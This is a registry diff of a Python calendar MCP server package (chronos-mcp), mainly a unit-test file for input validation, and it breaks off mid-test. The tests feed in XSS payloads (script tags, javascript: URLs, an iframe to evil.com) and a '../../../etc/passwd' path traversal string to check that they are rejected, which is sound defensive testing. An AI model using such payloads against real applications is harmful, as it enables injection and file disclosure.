iflow-mcp_democratize-technology-chronos-mcp 2.0.0__py3-none-any.whl
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- chronos_mcp/__init__.py +5 -0
- chronos_mcp/__main__.py +9 -0
- chronos_mcp/accounts.py +410 -0
- chronos_mcp/bulk.py +946 -0
- chronos_mcp/caldav_utils.py +149 -0
- chronos_mcp/calendars.py +204 -0
- chronos_mcp/config.py +187 -0
- chronos_mcp/credentials.py +190 -0
- chronos_mcp/events.py +515 -0
- chronos_mcp/exceptions.py +477 -0
- chronos_mcp/journals.py +477 -0
- chronos_mcp/logging_config.py +23 -0
- chronos_mcp/models.py +202 -0
- chronos_mcp/py.typed +0 -0
- chronos_mcp/rrule.py +259 -0
- chronos_mcp/search.py +315 -0
- chronos_mcp/server.py +121 -0
- chronos_mcp/tasks.py +518 -0
- chronos_mcp/tools/__init__.py +29 -0
- chronos_mcp/tools/accounts.py +151 -0
- chronos_mcp/tools/base.py +59 -0
- chronos_mcp/tools/bulk.py +557 -0
- chronos_mcp/tools/calendars.py +142 -0
- chronos_mcp/tools/events.py +698 -0
- chronos_mcp/tools/journals.py +310 -0
- chronos_mcp/tools/tasks.py +414 -0
- chronos_mcp/utils.py +163 -0
- chronos_mcp/validation.py +636 -0
- iflow_mcp_democratize_technology_chronos_mcp-2.0.0.dist-info/METADATA +299 -0
- iflow_mcp_democratize_technology_chronos_mcp-2.0.0.dist-info/RECORD +68 -0
- iflow_mcp_democratize_technology_chronos_mcp-2.0.0.dist-info/WHEEL +5 -0
- iflow_mcp_democratize_technology_chronos_mcp-2.0.0.dist-info/entry_points.txt +2 -0
- iflow_mcp_democratize_technology_chronos_mcp-2.0.0.dist-info/licenses/LICENSE +21 -0
- iflow_mcp_democratize_technology_chronos_mcp-2.0.0.dist-info/top_level.txt +2 -0
- tests/__init__.py +0 -0
- tests/conftest.py +91 -0
- tests/unit/__init__.py +0 -0
- tests/unit/test_accounts.py +380 -0
- tests/unit/test_accounts_ssrf.py +134 -0
- tests/unit/test_base.py +135 -0
- tests/unit/test_bulk.py +380 -0
- tests/unit/test_bulk_create.py +408 -0
- tests/unit/test_bulk_delete.py +341 -0
- tests/unit/test_bulk_resource_limits.py +74 -0
- tests/unit/test_caldav_utils.py +300 -0
- tests/unit/test_calendars.py +286 -0
- tests/unit/test_config.py +111 -0
- tests/unit/test_config_validation.py +128 -0
- tests/unit/test_credentials_security.py +189 -0
- tests/unit/test_cryptography_security.py +178 -0
- tests/unit/test_events.py +536 -0
- tests/unit/test_exceptions.py +58 -0
- tests/unit/test_journals.py +1097 -0
- tests/unit/test_models.py +95 -0
- tests/unit/test_race_conditions.py +202 -0
- tests/unit/test_recurring_events.py +156 -0
- tests/unit/test_rrule.py +217 -0
- tests/unit/test_search.py +372 -0
- tests/unit/test_search_advanced.py +333 -0
- tests/unit/test_server_input_validation.py +219 -0
- tests/unit/test_ssrf_protection.py +505 -0
- tests/unit/test_tasks.py +918 -0
- tests/unit/test_thread_safety.py +301 -0
- tests/unit/test_tools_journals.py +617 -0
- tests/unit/test_tools_tasks.py +968 -0
- tests/unit/test_url_validation_security.py +234 -0
- tests/unit/test_utils.py +180 -0
- tests/unit/test_validation.py +983 -0
|
@@ -0,0 +1,983 @@
|
|
|
1
|
+
"""
|
|
2
|
+
Unit tests for input validation
|
|
3
|
+
"""
|
|
4
|
+
|
|
5
|
+
from datetime import datetime
|
|
6
|
+
import ipaddress
|
|
7
|
+
import socket
|
|
8
|
+
from unittest.mock import patch
|
|
9
|
+
|
|
10
|
+
import pytest
|
|
11
|
+
|
|
12
|
+
from chronos_mcp.exceptions import ValidationError
|
|
13
|
+
from chronos_mcp.models import TaskStatus
|
|
14
|
+
from chronos_mcp.validation import InputValidator
|
|
15
|
+
|
|
16
|
+
|
|
17
|
+
class TestTextFieldValidation:
|
|
18
|
+
def test_validate_text_field_success(self):
|
|
19
|
+
"""Test successful text field validation"""
|
|
20
|
+
result = InputValidator.validate_text_field("Test Event", "summary")
|
|
21
|
+
assert result == "Test Event"
|
|
22
|
+
|
|
23
|
+
# Test with HTML entities (should NOT be escaped at storage layer)
|
|
24
|
+
result = InputValidator.validate_text_field("Meeting & Discussion", "summary")
|
|
25
|
+
assert result == "Meeting & Discussion" # No escaping at storage
|
|
26
|
+
|
|
27
|
+
def test_validate_text_field_required(self):
|
|
28
|
+
"""Test required field validation"""
|
|
29
|
+
# Required field with empty value
|
|
30
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
31
|
+
InputValidator.validate_text_field("", "summary", required=True)
|
|
32
|
+
assert "summary is required" in str(exc_info.value)
|
|
33
|
+
|
|
34
|
+
# Optional field with empty value
|
|
35
|
+
result = InputValidator.validate_text_field("", "description", required=False)
|
|
36
|
+
assert result == ""
|
|
37
|
+
|
|
38
|
+
def test_validate_text_field_length(self):
|
|
39
|
+
"""Test field length validation"""
|
|
40
|
+
# Exceed max length
|
|
41
|
+
long_text = "A" * 300
|
|
42
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
43
|
+
InputValidator.validate_text_field(long_text, "summary")
|
|
44
|
+
assert "exceeds maximum length" in str(exc_info.value)
|
|
45
|
+
|
|
46
|
+
def test_dangerous_patterns_detection(self):
|
|
47
|
+
"""Test detection of dangerous patterns"""
|
|
48
|
+
dangerous_inputs = [
|
|
49
|
+
"<script>alert('xss')</script>",
|
|
50
|
+
"<a href='javascript:void(0)'>",
|
|
51
|
+
"<div onclick='bad()'>",
|
|
52
|
+
"<script src='bad.js'></script>",
|
|
53
|
+
"<iframe src='evil.com'>",
|
|
54
|
+
"<object data='bad'>",
|
|
55
|
+
"<embed code='evil'>",
|
|
56
|
+
]
|
|
57
|
+
|
|
58
|
+
for dangerous_input in dangerous_inputs:
|
|
59
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
60
|
+
InputValidator.validate_text_field(dangerous_input, "description")
|
|
61
|
+
assert "potentially dangerous content" in str(exc_info.value)
|
|
62
|
+
|
|
63
|
+
def test_unicode_normalization(self):
|
|
64
|
+
"""Test Unicode normalization"""
|
|
65
|
+
# Unicode with different representations
|
|
66
|
+
text_nfc = "café" # NFC form
|
|
67
|
+
text_nfd = "café" # NFD form (e + combining acute)
|
|
68
|
+
|
|
69
|
+
result1 = InputValidator.validate_text_field(text_nfc, "summary")
|
|
70
|
+
result2 = InputValidator.validate_text_field(text_nfd, "summary")
|
|
71
|
+
|
|
72
|
+
# Both should normalize to the same form
|
|
73
|
+
assert result1 == result2
|
|
74
|
+
|
|
75
|
+
|
|
76
|
+
class TestDateTimeValidation:
|
|
77
|
+
def test_validate_datetime_success(self):
|
|
78
|
+
"""Test successful datetime validation"""
|
|
79
|
+
# Already a datetime object
|
|
80
|
+
dt = datetime.now()
|
|
81
|
+
result = InputValidator.validate_datetime(dt, "dtstart")
|
|
82
|
+
assert result == dt
|
|
83
|
+
|
|
84
|
+
# ISO format string
|
|
85
|
+
iso_str = "2025-07-10T10:00:00"
|
|
86
|
+
result = InputValidator.validate_datetime(iso_str, "dtstart")
|
|
87
|
+
assert isinstance(result, datetime)
|
|
88
|
+
|
|
89
|
+
# ISO format with Z suffix
|
|
90
|
+
iso_z = "2025-07-10T10:00:00Z"
|
|
91
|
+
result = InputValidator.validate_datetime(iso_z, "dtstart")
|
|
92
|
+
assert isinstance(result, datetime)
|
|
93
|
+
|
|
94
|
+
def test_validate_datetime_failure(self):
|
|
95
|
+
"""Test datetime validation failures"""
|
|
96
|
+
# Invalid format
|
|
97
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
98
|
+
InputValidator.validate_datetime("not a date", "dtstart")
|
|
99
|
+
assert "Invalid datetime format" in str(exc_info.value)
|
|
100
|
+
|
|
101
|
+
# Wrong type
|
|
102
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
103
|
+
InputValidator.validate_datetime(12345, "dtstart")
|
|
104
|
+
assert "must be a datetime or ISO format string" in str(exc_info.value)
|
|
105
|
+
|
|
106
|
+
|
|
107
|
+
class TestUIDValidation:
|
|
108
|
+
def test_validate_uid_success(self):
|
|
109
|
+
"""Test successful UID validation"""
|
|
110
|
+
valid_uids = [
|
|
111
|
+
"event-123",
|
|
112
|
+
"abc_def",
|
|
113
|
+
"test.uid",
|
|
114
|
+
"user@example.com",
|
|
115
|
+
"UID-2025-07-10",
|
|
116
|
+
]
|
|
117
|
+
|
|
118
|
+
for uid in valid_uids:
|
|
119
|
+
result = InputValidator.validate_uid(uid)
|
|
120
|
+
assert result == uid
|
|
121
|
+
|
|
122
|
+
def test_validate_uid_failure(self):
|
|
123
|
+
"""Test UID validation failures"""
|
|
124
|
+
# Empty UID
|
|
125
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
126
|
+
InputValidator.validate_uid("")
|
|
127
|
+
assert "UID cannot be empty" in str(exc_info.value)
|
|
128
|
+
|
|
129
|
+
# Invalid characters
|
|
130
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
131
|
+
InputValidator.validate_uid("uid with spaces")
|
|
132
|
+
assert "invalid characters" in str(exc_info.value)
|
|
133
|
+
|
|
134
|
+
# Path traversal attempt
|
|
135
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
136
|
+
InputValidator.validate_uid("../../../etc/passwd")
|
|
137
|
+
# This will fail the regex check first, not the path check
|
|
138
|
+
assert "invalid characters" in str(exc_info.value)
|
|
139
|
+
|
|
140
|
+
# Too long
|
|
141
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
142
|
+
InputValidator.validate_uid("a" * 300)
|
|
143
|
+
assert "exceeds maximum length" in str(exc_info.value)
|
|
144
|
+
|
|
145
|
+
|
|
146
|
+
class TestEmailValidation:
|
|
147
|
+
def test_validate_email_success(self):
|
|
148
|
+
"""Test successful email validation"""
|
|
149
|
+
valid_emails = [
|
|
150
|
+
"user@example.com",
|
|
151
|
+
"test.user@domain.co.uk",
|
|
152
|
+
"name+tag@example.org",
|
|
153
|
+
"admin123@test-domain.com",
|
|
154
|
+
]
|
|
155
|
+
|
|
156
|
+
for email in valid_emails:
|
|
157
|
+
result = InputValidator.validate_email(email)
|
|
158
|
+
assert result == email.lower() # Should be lowercased
|
|
159
|
+
|
|
160
|
+
def test_validate_email_failure(self):
|
|
161
|
+
"""Test email validation failures"""
|
|
162
|
+
invalid_emails = [
|
|
163
|
+
"not-an-email",
|
|
164
|
+
"@example.com",
|
|
165
|
+
"user@",
|
|
166
|
+
"user@@example.com",
|
|
167
|
+
"user@.com",
|
|
168
|
+
"a" * 250 + "@example.com", # Too long
|
|
169
|
+
]
|
|
170
|
+
|
|
171
|
+
for email in invalid_emails:
|
|
172
|
+
with pytest.raises(ValidationError):
|
|
173
|
+
InputValidator.validate_email(email)
|
|
174
|
+
|
|
175
|
+
|
|
176
|
+
class TestEventValidation:
|
|
177
|
+
def test_validate_event_success(self):
|
|
178
|
+
"""Test successful event validation"""
|
|
179
|
+
event_data = {
|
|
180
|
+
"summary": "Team Meeting",
|
|
181
|
+
"dtstart": "2025-07-10T10:00:00",
|
|
182
|
+
"dtend": "2025-07-10T11:00:00",
|
|
183
|
+
"description": "Weekly sync",
|
|
184
|
+
"location": "Conference Room",
|
|
185
|
+
}
|
|
186
|
+
|
|
187
|
+
result = InputValidator.validate_event(event_data)
|
|
188
|
+
|
|
189
|
+
assert result["summary"] == "Team Meeting"
|
|
190
|
+
assert isinstance(result["dtstart"], datetime)
|
|
191
|
+
assert isinstance(result["dtend"], datetime)
|
|
192
|
+
assert result["description"] == "Weekly sync"
|
|
193
|
+
assert result["location"] == "Conference Room"
|
|
194
|
+
|
|
195
|
+
def test_validate_event_missing_required(self):
|
|
196
|
+
"""Test event validation with missing required fields"""
|
|
197
|
+
# Missing summary
|
|
198
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
199
|
+
InputValidator.validate_event(
|
|
200
|
+
{"dtstart": "2025-07-10T10:00:00", "dtend": "2025-07-10T11:00:00"}
|
|
201
|
+
)
|
|
202
|
+
assert "summary is required" in str(exc_info.value)
|
|
203
|
+
|
|
204
|
+
# Missing dates
|
|
205
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
206
|
+
InputValidator.validate_event({"summary": "Test"})
|
|
207
|
+
assert "start time is required" in str(exc_info.value)
|
|
208
|
+
|
|
209
|
+
def test_validate_event_date_logic(self):
|
|
210
|
+
"""Test event date validation logic"""
|
|
211
|
+
# End before start
|
|
212
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
213
|
+
InputValidator.validate_event(
|
|
214
|
+
{
|
|
215
|
+
"summary": "Test",
|
|
216
|
+
"dtstart": "2025-07-10T11:00:00",
|
|
217
|
+
"dtend": "2025-07-10T10:00:00",
|
|
218
|
+
}
|
|
219
|
+
)
|
|
220
|
+
assert "end time must be after start time" in str(exc_info.value)
|
|
221
|
+
|
|
222
|
+
|
|
223
|
+
class TestAttendeeValidation:
|
|
224
|
+
def test_validate_attendees_success(self):
|
|
225
|
+
"""Test successful attendee validation"""
|
|
226
|
+
attendees = [
|
|
227
|
+
{
|
|
228
|
+
"email": "user1@example.com",
|
|
229
|
+
"name": "User One",
|
|
230
|
+
"role": "REQ-PARTICIPANT",
|
|
231
|
+
"status": "ACCEPTED",
|
|
232
|
+
"rsvp": True,
|
|
233
|
+
},
|
|
234
|
+
{"email": "user2@example.com"}, # Minimal attendee
|
|
235
|
+
]
|
|
236
|
+
|
|
237
|
+
result = InputValidator.validate_attendees(attendees)
|
|
238
|
+
|
|
239
|
+
assert len(result) == 2
|
|
240
|
+
assert result[0]["email"] == "user1@example.com"
|
|
241
|
+
assert result[0]["role"] == "REQ-PARTICIPANT"
|
|
242
|
+
assert result[1]["email"] == "user2@example.com"
|
|
243
|
+
|
|
244
|
+
def test_validate_attendees_failure(self):
|
|
245
|
+
"""Test attendee validation failures"""
|
|
246
|
+
# Not a list
|
|
247
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
248
|
+
InputValidator.validate_attendees("not a list")
|
|
249
|
+
assert "must be a list" in str(exc_info.value)
|
|
250
|
+
|
|
251
|
+
# Missing email
|
|
252
|
+
with pytest.raises(ValidationError):
|
|
253
|
+
InputValidator.validate_attendees([{"name": "No Email"}])
|
|
254
|
+
|
|
255
|
+
# Invalid role
|
|
256
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
257
|
+
InputValidator.validate_attendees(
|
|
258
|
+
[{"email": "test@example.com", "role": "INVALID-ROLE"}]
|
|
259
|
+
)
|
|
260
|
+
assert "Invalid attendee role" in str(exc_info.value)
|
|
261
|
+
|
|
262
|
+
|
|
263
|
+
class TestRRULEValidation:
|
|
264
|
+
def test_validate_rrule_success(self):
|
|
265
|
+
"""Test successful RRULE validation"""
|
|
266
|
+
valid_rules = [
|
|
267
|
+
"FREQ=DAILY",
|
|
268
|
+
"FREQ=WEEKLY;BYDAY=MO,WE,FR",
|
|
269
|
+
"FREQ=MONTHLY;BYMONTHDAY=15",
|
|
270
|
+
"FREQ=YEARLY;BYMONTH=12;BYMONTHDAY=25",
|
|
271
|
+
]
|
|
272
|
+
|
|
273
|
+
for rule in valid_rules:
|
|
274
|
+
result = InputValidator.validate_rrule(rule)
|
|
275
|
+
assert result == rule.upper()
|
|
276
|
+
|
|
277
|
+
def test_validate_rrule_failure(self):
|
|
278
|
+
"""Test RRULE validation failures"""
|
|
279
|
+
# Must start with FREQ
|
|
280
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
281
|
+
InputValidator.validate_rrule("BYDAY=MO")
|
|
282
|
+
assert "must start with FREQ=" in str(exc_info.value)
|
|
283
|
+
|
|
284
|
+
# Invalid frequency
|
|
285
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
286
|
+
InputValidator.validate_rrule("FREQ=HOURLY")
|
|
287
|
+
assert "Invalid frequency" in str(exc_info.value)
|
|
288
|
+
|
|
289
|
+
# Too long
|
|
290
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
291
|
+
InputValidator.validate_rrule("FREQ=DAILY;" + "X=Y;" * 200)
|
|
292
|
+
assert "too complex" in str(exc_info.value)
|
|
293
|
+
|
|
294
|
+
|
|
295
|
+
class TestTaskValidation:
|
|
296
|
+
"""Test task validation functionality"""
|
|
297
|
+
|
|
298
|
+
def test_validate_task_success(self):
|
|
299
|
+
"""Test successful task validation"""
|
|
300
|
+
task_data = {
|
|
301
|
+
"summary": "Complete project",
|
|
302
|
+
"description": "Finish the validation improvements",
|
|
303
|
+
"due": "2025-12-31T23:59:59",
|
|
304
|
+
"priority": 5,
|
|
305
|
+
"status": "NEEDS-ACTION",
|
|
306
|
+
"percent_complete": 25,
|
|
307
|
+
"uid": "task-123",
|
|
308
|
+
"related_to": ["parent-task-456"],
|
|
309
|
+
}
|
|
310
|
+
|
|
311
|
+
result = InputValidator.validate_task(task_data)
|
|
312
|
+
|
|
313
|
+
assert result["summary"] == "Complete project"
|
|
314
|
+
assert result["description"] == "Finish the validation improvements"
|
|
315
|
+
assert isinstance(result["due"], datetime)
|
|
316
|
+
assert result["priority"] == 5
|
|
317
|
+
assert result["status"] == TaskStatus.NEEDS_ACTION
|
|
318
|
+
assert result["percent_complete"] == 25
|
|
319
|
+
assert result["uid"] == "task-123"
|
|
320
|
+
assert result["related_to"] == ["parent-task-456"]
|
|
321
|
+
|
|
322
|
+
def test_validate_task_minimal(self):
|
|
323
|
+
"""Test task validation with only required fields"""
|
|
324
|
+
task_data = {"summary": "Simple task"}
|
|
325
|
+
|
|
326
|
+
result = InputValidator.validate_task(task_data)
|
|
327
|
+
assert result["summary"] == "Simple task"
|
|
328
|
+
assert len(result) == 1 # Only summary should be present
|
|
329
|
+
|
|
330
|
+
def test_validate_task_missing_summary(self):
|
|
331
|
+
"""Test task validation with missing summary"""
|
|
332
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
333
|
+
InputValidator.validate_task({})
|
|
334
|
+
assert "summary is required" in str(exc_info.value)
|
|
335
|
+
|
|
336
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
337
|
+
InputValidator.validate_task({"summary": ""})
|
|
338
|
+
assert "summary is required" in str(exc_info.value)
|
|
339
|
+
|
|
340
|
+
def test_validate_task_optional_fields_none(self):
|
|
341
|
+
"""Test task validation with None values for optional fields"""
|
|
342
|
+
task_data = {
|
|
343
|
+
"summary": "Task with nulls",
|
|
344
|
+
"due": None,
|
|
345
|
+
"priority": None,
|
|
346
|
+
"status": None,
|
|
347
|
+
"percent_complete": None,
|
|
348
|
+
}
|
|
349
|
+
|
|
350
|
+
result = InputValidator.validate_task(task_data)
|
|
351
|
+
assert result["summary"] == "Task with nulls"
|
|
352
|
+
# None values should not be included in result
|
|
353
|
+
assert "due" not in result
|
|
354
|
+
assert "priority" not in result
|
|
355
|
+
assert "status" not in result
|
|
356
|
+
assert "percent_complete" not in result
|
|
357
|
+
|
|
358
|
+
|
|
359
|
+
class TestPriorityValidation:
|
|
360
|
+
"""Test priority validation"""
|
|
361
|
+
|
|
362
|
+
def test_validate_priority_success(self):
|
|
363
|
+
"""Test valid priority values (1-9)"""
|
|
364
|
+
for priority in range(1, 10):
|
|
365
|
+
result = InputValidator.validate_priority(priority)
|
|
366
|
+
assert result == priority
|
|
367
|
+
|
|
368
|
+
# Test string numbers
|
|
369
|
+
result = InputValidator.validate_priority("5")
|
|
370
|
+
assert result == 5
|
|
371
|
+
|
|
372
|
+
def test_validate_priority_boundary_failures(self):
|
|
373
|
+
"""Test priority validation boundary conditions"""
|
|
374
|
+
# Below minimum
|
|
375
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
376
|
+
InputValidator.validate_priority(0)
|
|
377
|
+
assert "between 1-9" in str(exc_info.value)
|
|
378
|
+
|
|
379
|
+
# Above maximum
|
|
380
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
381
|
+
InputValidator.validate_priority(10)
|
|
382
|
+
assert "between 1-9" in str(exc_info.value)
|
|
383
|
+
|
|
384
|
+
# Negative values
|
|
385
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
386
|
+
InputValidator.validate_priority(-1)
|
|
387
|
+
assert "between 1-9" in str(exc_info.value)
|
|
388
|
+
|
|
389
|
+
def test_validate_priority_type_errors(self):
|
|
390
|
+
"""Test priority validation with invalid types"""
|
|
391
|
+
invalid_priorities = ["not-a-number", None, [], {}, "1.5"]
|
|
392
|
+
|
|
393
|
+
for invalid in invalid_priorities:
|
|
394
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
395
|
+
InputValidator.validate_priority(invalid)
|
|
396
|
+
assert "must be an integer" in str(exc_info.value)
|
|
397
|
+
|
|
398
|
+
# Test float separately - int(3.14) succeeds but gives wrong value
|
|
399
|
+
# This tests that float conversion works, which is Python's default behavior
|
|
400
|
+
result = InputValidator.validate_priority(3.14)
|
|
401
|
+
assert result == 3 # float gets truncated to int
|
|
402
|
+
|
|
403
|
+
|
|
404
|
+
class TestTaskStatusValidation:
|
|
405
|
+
"""Test task status validation"""
|
|
406
|
+
|
|
407
|
+
def test_validate_task_status_success(self):
|
|
408
|
+
"""Test valid task status values"""
|
|
409
|
+
valid_statuses = [
|
|
410
|
+
TaskStatus.NEEDS_ACTION,
|
|
411
|
+
TaskStatus.IN_PROCESS,
|
|
412
|
+
TaskStatus.COMPLETED,
|
|
413
|
+
TaskStatus.CANCELLED,
|
|
414
|
+
]
|
|
415
|
+
|
|
416
|
+
for status in valid_statuses:
|
|
417
|
+
result = InputValidator.validate_task_status(status)
|
|
418
|
+
assert result == status
|
|
419
|
+
|
|
420
|
+
# Test string values
|
|
421
|
+
result = InputValidator.validate_task_status("NEEDS-ACTION")
|
|
422
|
+
assert result == TaskStatus.NEEDS_ACTION
|
|
423
|
+
|
|
424
|
+
result = InputValidator.validate_task_status("COMPLETED")
|
|
425
|
+
assert result == TaskStatus.COMPLETED
|
|
426
|
+
|
|
427
|
+
def test_validate_task_status_failure(self):
|
|
428
|
+
"""Test task status validation failures"""
|
|
429
|
+
invalid_statuses = [
|
|
430
|
+
"INVALID-STATUS",
|
|
431
|
+
"needs-action", # Wrong case
|
|
432
|
+
"PENDING",
|
|
433
|
+
"ACTIVE",
|
|
434
|
+
123,
|
|
435
|
+
None,
|
|
436
|
+
]
|
|
437
|
+
|
|
438
|
+
for invalid in invalid_statuses:
|
|
439
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
440
|
+
InputValidator.validate_task_status(invalid)
|
|
441
|
+
assert "Invalid task status" in str(exc_info.value)
|
|
442
|
+
|
|
443
|
+
|
|
444
|
+
class TestPercentCompleteValidation:
|
|
445
|
+
"""Test percent complete validation"""
|
|
446
|
+
|
|
447
|
+
def test_validate_percent_complete_success(self):
|
|
448
|
+
"""Test valid percent complete values (0-100)"""
|
|
449
|
+
for percent in range(0, 101):
|
|
450
|
+
result = InputValidator.validate_percent_complete(percent)
|
|
451
|
+
assert result == percent
|
|
452
|
+
|
|
453
|
+
# Test string numbers
|
|
454
|
+
result = InputValidator.validate_percent_complete("50")
|
|
455
|
+
assert result == 50
|
|
456
|
+
|
|
457
|
+
result = InputValidator.validate_percent_complete("0")
|
|
458
|
+
assert result == 0
|
|
459
|
+
|
|
460
|
+
result = InputValidator.validate_percent_complete("100")
|
|
461
|
+
assert result == 100
|
|
462
|
+
|
|
463
|
+
def test_validate_percent_complete_boundary_failures(self):
|
|
464
|
+
"""Test percent complete boundary conditions"""
|
|
465
|
+
# Below minimum
|
|
466
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
467
|
+
InputValidator.validate_percent_complete(-1)
|
|
468
|
+
assert "between 0-100" in str(exc_info.value)
|
|
469
|
+
|
|
470
|
+
# Above maximum
|
|
471
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
472
|
+
InputValidator.validate_percent_complete(101)
|
|
473
|
+
assert "between 0-100" in str(exc_info.value)
|
|
474
|
+
|
|
475
|
+
# Large values
|
|
476
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
477
|
+
InputValidator.validate_percent_complete(999)
|
|
478
|
+
assert "between 0-100" in str(exc_info.value)
|
|
479
|
+
|
|
480
|
+
def test_validate_percent_complete_type_errors(self):
|
|
481
|
+
"""Test percent complete validation with invalid types"""
|
|
482
|
+
invalid_percents = ["not-a-number", None, [], {}, "50.5"]
|
|
483
|
+
|
|
484
|
+
for invalid in invalid_percents:
|
|
485
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
486
|
+
InputValidator.validate_percent_complete(invalid)
|
|
487
|
+
assert "must be an integer" in str(exc_info.value)
|
|
488
|
+
|
|
489
|
+
# Test float separately - int(3.14) succeeds but truncates
|
|
490
|
+
result = InputValidator.validate_percent_complete(75.8)
|
|
491
|
+
assert result == 75 # float gets truncated to int
|
|
492
|
+
|
|
493
|
+
|
|
494
|
+
class TestJournalValidation:
|
|
495
|
+
"""Test journal validation functionality"""
|
|
496
|
+
|
|
497
|
+
def test_validate_journal_success(self):
|
|
498
|
+
"""Test successful journal validation"""
|
|
499
|
+
journal_data = {
|
|
500
|
+
"summary": "Meeting notes",
|
|
501
|
+
"description": "Discussed project timeline and deliverables",
|
|
502
|
+
"dtstart": "2025-07-10T14:30:00",
|
|
503
|
+
"categories": ["work", "meeting", "project"],
|
|
504
|
+
"uid": "journal-789",
|
|
505
|
+
"related_to": ["event-123", "task-456"],
|
|
506
|
+
}
|
|
507
|
+
|
|
508
|
+
result = InputValidator.validate_journal(journal_data)
|
|
509
|
+
|
|
510
|
+
assert result["summary"] == "Meeting notes"
|
|
511
|
+
assert result["description"] == "Discussed project timeline and deliverables"
|
|
512
|
+
assert isinstance(result["dtstart"], datetime)
|
|
513
|
+
assert result["categories"] == ["work", "meeting", "project"]
|
|
514
|
+
assert result["uid"] == "journal-789"
|
|
515
|
+
assert result["related_to"] == ["event-123", "task-456"]
|
|
516
|
+
|
|
517
|
+
def test_validate_journal_minimal(self):
|
|
518
|
+
"""Test journal validation with only required fields"""
|
|
519
|
+
journal_data = {"summary": "Simple note"}
|
|
520
|
+
|
|
521
|
+
result = InputValidator.validate_journal(journal_data)
|
|
522
|
+
assert result["summary"] == "Simple note"
|
|
523
|
+
assert len(result) == 1
|
|
524
|
+
|
|
525
|
+
def test_validate_journal_missing_summary(self):
|
|
526
|
+
"""Test journal validation with missing summary"""
|
|
527
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
528
|
+
InputValidator.validate_journal({})
|
|
529
|
+
assert "summary is required" in str(exc_info.value)
|
|
530
|
+
|
|
531
|
+
def test_validate_journal_optional_fields_none(self):
|
|
532
|
+
"""Test journal validation with None values"""
|
|
533
|
+
journal_data = {"summary": "Journal with nulls", "dtstart": None}
|
|
534
|
+
|
|
535
|
+
result = InputValidator.validate_journal(journal_data)
|
|
536
|
+
assert result["summary"] == "Journal with nulls"
|
|
537
|
+
assert "dtstart" not in result
|
|
538
|
+
|
|
539
|
+
|
|
540
|
+
class TestCategoriesValidation:
|
|
541
|
+
"""Test categories validation"""
|
|
542
|
+
|
|
543
|
+
def test_validate_categories_success(self):
|
|
544
|
+
"""Test successful categories validation"""
|
|
545
|
+
# List of categories
|
|
546
|
+
categories = ["work", "meeting", "important"]
|
|
547
|
+
result = InputValidator.validate_categories(categories)
|
|
548
|
+
assert result == categories
|
|
549
|
+
|
|
550
|
+
# Single category as string
|
|
551
|
+
result = InputValidator.validate_categories("personal")
|
|
552
|
+
assert result == ["personal"]
|
|
553
|
+
|
|
554
|
+
# Empty list
|
|
555
|
+
result = InputValidator.validate_categories([])
|
|
556
|
+
assert result == []
|
|
557
|
+
|
|
558
|
+
def test_validate_categories_filtering(self):
|
|
559
|
+
"""Test categories validation with empty strings"""
|
|
560
|
+
categories = ["work", "", "meeting", " ", "project"]
|
|
561
|
+
result = InputValidator.validate_categories(categories)
|
|
562
|
+
# Empty and whitespace-only categories should be filtered out
|
|
563
|
+
assert "work" in result
|
|
564
|
+
assert "meeting" in result
|
|
565
|
+
assert "project" in result
|
|
566
|
+
assert "" not in result
|
|
567
|
+
assert " " not in result
|
|
568
|
+
|
|
569
|
+
def test_validate_categories_failure(self):
|
|
570
|
+
"""Test categories validation failures"""
|
|
571
|
+
# Invalid types
|
|
572
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
573
|
+
InputValidator.validate_categories(123)
|
|
574
|
+
assert "must be a list or string" in str(exc_info.value)
|
|
575
|
+
|
|
576
|
+
# Non-string items in list
|
|
577
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
578
|
+
InputValidator.validate_categories(["work", 123, "meeting"])
|
|
579
|
+
assert "must be a string" in str(exc_info.value)
|
|
580
|
+
|
|
581
|
+
def test_validate_categories_dangerous_content(self):
|
|
582
|
+
"""Test categories validation with dangerous content"""
|
|
583
|
+
dangerous_categories = [
|
|
584
|
+
"<script>alert('xss')</script>",
|
|
585
|
+
"javascript:void(0)",
|
|
586
|
+
"work<iframe>evil</iframe>",
|
|
587
|
+
]
|
|
588
|
+
|
|
589
|
+
for dangerous in dangerous_categories:
|
|
590
|
+
with pytest.raises(ValidationError) as exc_info:
|
|
591
|
+
InputValidator.validate_categories([dangerous])
|
|
592
|
+
assert "potentially dangerous content" in str(exc_info.value)
|
|
593
|
+
|
|
594
|
+
|
|
595
|
+
class TestRelatedToValidation:
|
|
596
|
+
"""Test RELATED-TO validation"""
|
|
597
|
+
|
|
598
|
+
def test_validate_related_to_success(self):
|
|
599
|
+
"""Test successful RELATED-TO validation"""
|
|
600
|
+
# List of UIDs
|
|
601
|
+
uids = ["task-123", "event-456", "journal-789"]
|
|
602
|
+
result = InputValidator.validate_related_to(uids)
|
|
603
|
+
assert result == uids
|
|
604
|
+
|
|
605
|
+
# Single UID as string
|
|
606
|
+
